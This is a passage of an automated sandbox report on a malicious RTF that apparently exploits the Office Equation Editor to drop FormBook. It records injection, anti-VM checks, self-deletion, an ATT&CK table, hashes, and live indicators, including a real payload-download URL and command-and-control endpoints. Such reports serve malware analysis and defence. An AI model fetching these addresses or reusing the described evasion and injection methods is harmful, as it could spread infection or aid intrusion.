            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000CB75A push esp; retf 6_2_000CB75C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D685A push C1F93286h; ret 6_2_000D685F
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77893217222
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara matchFile source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2652, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9B7E second address: 00000000000C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1528Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2576Thread sleep time: -37574s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2588Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 2080Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2028Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 37574Jump to behavior
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.431669651.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.456077913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000g
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A526F8 mov eax, dword ptr fs:[00000030h]4_2_00A526F8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB00EA mov eax, dword ptr fs:[00000030h]6_2_01EB00EA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB0080 mov ecx, dword ptr fs:[00000030h]6_2_01EB0080
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED26F8 mov eax, dword ptr fs:[00000030h]6_2_01ED26F8
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,4_2_0040ACF0
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
            Sample uses process hollowing technique
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 480000Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 111 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph. ID: 528701; Sample: 3nkW4MtwSD; Startdate: 25/11/2021; Architecture: WINDOWS; Score: 100. Process chain: EQNEDT32.EXE started vbc.exe, which started a second vbc.exe, which started raserver.exe and injected into explorer.exe; raserver.exe started cmd.exe. EQNEDT32.EXE contacted 198.46.199.153 (port 80, AS-COLOCROSSINGUS, United States) and dropped C:\Users\user\AppData\Local\...\vbc[1].exe and C:\Users\Public\vbc.exe (both PE32); WINWORD.EXE dropped ~WRF{85338F29-7DEE...4-3AA1C7FBE740}.tmp; explorer.exe queried www.mountfrenchlodge.net and www.cuteprofessionalscrubs.com.]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            3nkW4MtwSD.rtf | 56% | Virustotal | -
            3nkW4MtwSD.rtf | 100% | Avira | HEUR/Rtf.Malformed

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp | 100% | Joe Sandbox ML | -

            Unpacked PE Files

            Source | Detection | Scanner | Label
            4.0.vbc.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.0.vbc.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner
            cuteprofessionalscrubs.com | 4% | Virustotal
            troddu.com | 0% | Virustotal

            URLs

            Source | Detection | Scanner | Label
            www.cuteprofessionalscrubs.com/9gr5/ | 0% | Avira URL Cloud | safe
            http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
            http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
            http://198.46.199.153/70007/vbc.exe | 0% | Avira URL Cloud | safe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
            http://treyresearch.net | 0% | URL Reputation | safe
            http://java.sun.com | 0% | URL Reputation | safe
            http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
            http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
            http://www.%s.comPA | 0% | URL Reputation | safe
            http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 | 0% | Avira URL Cloud | safe
            http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 | 0% | Avira URL Cloud | safe
            http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            cuteprofessionalscrubs.com | 34.102.136.180 | true | false | - | unknown
            mountfrenchlodge.net | 34.102.136.180 | true | false | - | unknown
            troddu.com | 162.240.31.112 | true | true | - | unknown
            www.troddu.com | unknown | unknown | true | - | unknown
            www.cuteprofessionalscrubs.com | unknown | unknown | true | - | unknown
            www.mountfrenchlodge.net | unknown | unknown | true | - | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    www.cuteprofessionalscrubs.com/9gr5/ | true | Avira URL Cloud: safe | low
                    http://198.46.199.153/70007/vbc.exe | true | Avira URL Cloud: safe | unknown
                    http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 | false | Avira URL Cloud: safe | unknown
                    http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 | false | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries


                                                            Contacted IPs

                                                            Public

                                                            IP | Domain | Country | ASN | ASN Name | Malicious
                                                            198.46.199.153 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                                                            34.102.136.180 | cuteprofessionalscrubs.com | United States | 15169 | GOOGLEUS | false

                                                            General Information

                                                            Joe Sandbox Version: 34.0.0 Boulder Opal
                                                            Analysis ID: 528701
                                                            Start date: 25.11.2021
                                                            Start time: 17:23:10
                                                            Joe Sandbox Product: CloudBasic
                                                            Overall analysis duration: 0h 10m 53s
                                                            Hypervisor based Inspection enabled: false
                                                            Report type: full
                                                            Sample file name: 3nkW4MtwSD (renamed file extension from none to rtf)
                                                            Cookbook file name: defaultwindowsofficecookbook.jbs
                                                            Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed: 9
                                                            Number of new started drivers analysed: 0
                                                            Number of existing processes analysed: 0
                                                            Number of existing drivers analysed: 0
                                                            Number of injected processes analysed: 1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode: default
                                                            Analysis stop reason: Timeout
                                                            Detection: MAL
                                                            Classification: mal100.troj.expl.evad.winRTF@10/9@3/2
                                                            EGA Information: Failed
                                                            HDC Information:
                                                            • Successful, ratio: 16.7% (good quality ratio 16%)
                                                            • Quality average: 73.5%
                                                            • Quality standard deviation: 27.8%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 89
                                                            • Number of non-executed functions: 50
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Found warning dialog
                                                            • Click Ok
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                            • Not all processes were analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            Time | Type | Description
                                                            17:24:14 | API Interceptor | 70x Sleep call for process: EQNEDT32.EXE modified
                                                            17:24:17 | API Interceptor | 146x Sleep call for process: vbc.exe modified
                                                            17:24:55 | API Interceptor | 146x Sleep call for process: raserver.exe modified
                                                            17:25:40 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            Match | Associated Sample Name / URL | Detection | Context
                                                            198.46.199.153 | lSBl5Mhq80.rtf | malicious | 198.46.199.153/76734/VBC.exe
                                                            198.46.199.153 | new order.docx | malicious | 198.46.199.153/76734/VBC.exe
                                                            198.46.199.153 | new order.xlsx | malicious | 198.46.199.153/68886/VBC.exe
                                                            198.46.199.153 | Neue Bestellung.xlsx | malicious | 198.46.199.153/566665/VBC.exe
                                                            198.46.199.153 | purchase order.xlsx | malicious | 198.46.199.153/9994/VBC.exe
                                                            198.46.199.153 | neworder.xlsx | malicious | 198.46.199.153/566665/vbc.exe
                                                            198.46.199.153 | PO 35572 FOR CONTRA 23.08.xlsx | malicious | 198.46.199.153/1112/VBC.exe
                                                            198.46.199.153 | PO 35572 FOR CONTRA 23.08.xlsx | malicious | 198.46.199.153/1112/VBC.exe
                                                            198.46.199.153 | quotation.xlsx | malicious | 198.46.199.153/1112/VBC.exe
                                                            198.46.199.153 | order2123.xlsx | malicious | 198.46.199.153/1112/VBC.exe

                                                            Domains

                                                            No context

                                                            ASN


                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                            Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category: downloaded
                                                            Size (bytes): 739840
                                                            Entropy (8bit): 7.768720486449457
                                                            Encrypted: false
                                                            SSDEEP: 12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5: 075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1: 984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256: 42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512: D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious: true
                                                            Reputation: low
                                                            IE Cache URL: http://198.46.199.153/70007/vbc.exe
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp
                                                            Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type: Composite Document File V2 Document, Cannot read section info
                                                            Category: dropped
                                                            Size (bytes): 5632
                                                            Entropy (8bit): 4.215971182386183
                                                            Encrypted: false
                                                            SSDEEP: 48:rf6resS6fB++YrNbC4FE/9c+FhHmJspzIf:+rexCBYrNbC4KFhPzy
                                                            MD5: A553A58C04781D311C71B7DA1B7CAD57
                                                            SHA1: 10AD372D975F93EDA1DC9CD9A92D45992CA85F38
                                                            SHA-256: 9BC8FBA0075B6F379D906661ACE1D80A764A1022213D127E3EAC56CFF5A41779
                                                            SHA-512: 8C706B34EF18F8CE68401E6B9DF47EDF10D2BE81CA7725BC480412ED4BDB146EDF03CBF502721227CB1D132313F5131E62B94774617BF462FCB9B785E3E26BB6
                                                            Malicious: true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation: low
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{105A16FA-9724-40E9-B86D-EF139A6795E6}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):3.5345865006836488
                                                            Encrypted:false
                                                            SSDEEP:96:YyOv6PI3Jv6BweyjGQ803dRybHF9qXXy3dwZ4HoCmWJZ3qrlircuA:YyGZh6meu80NRybl2WbZ6rErcZ
                                                            MD5:9E74D0391BDB20A19FCE576A18E374DD
                                                            SHA1:CAD0F85D1E24708A6CE05BB7791BCD8A1DE982D4
                                                            SHA-256:1A183A30D730EAE29C9EBFBF5DC2FD0B9F40BBCEAC2FFBD896C7778AED5B937D
                                                            SHA-512:F14F7D10706E955DA2D267BC28871D2342B10E8B7CD65FA7555E3B7157C8CD03BA8831CDC896495AE542C60749766E6137E007D657AE3599FB200558716DAB9B
                                                            Malicious:false
                                                            Reputation:low
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3nkW4MtwSD.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 00:24:08 2021, mtime=Fri Nov 26 00:24:08 2021, atime=Fri Nov 26 00:24:12 2021, length=22268, window=hide
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):4.543786462395175
                                                            Encrypted:false
